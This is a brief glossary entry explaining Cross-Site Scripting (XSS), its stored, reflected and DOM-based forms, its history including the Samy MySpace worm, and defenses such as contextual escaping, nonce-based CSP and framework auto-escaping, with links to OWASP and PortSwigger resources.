Security also: Cross-Site Scripting

XSS

Injecting attacker-controlled JS into a page that the browser then trusts.

In plain terms

Stored, reflected, DOM-based. Defenses: contextual escaping, CSP, framework-level auto-escape (React, Svelte).

Origin

Coined by Microsoft engineers in 2000. The 2007 Samy MySpace worm spread to a million accounts in 20 hours using stored XSS; XSS remained #1 on the OWASP Top 10 from its inception until 2017.

Where it shows up in production

React, Svelte, Vue Auto-escape every interpolated string by default. dangerouslySetInnerHTML is the explicit opt-out.
Strict CSP A nonce-based CSP renders most classical XSS payloads inert even if the bug exists.

Sources & further reading

Docs OWASP — XSS Prevention Cheat Sheet
Docs PortSwigger Web Security Academy — XSS

Found this useful?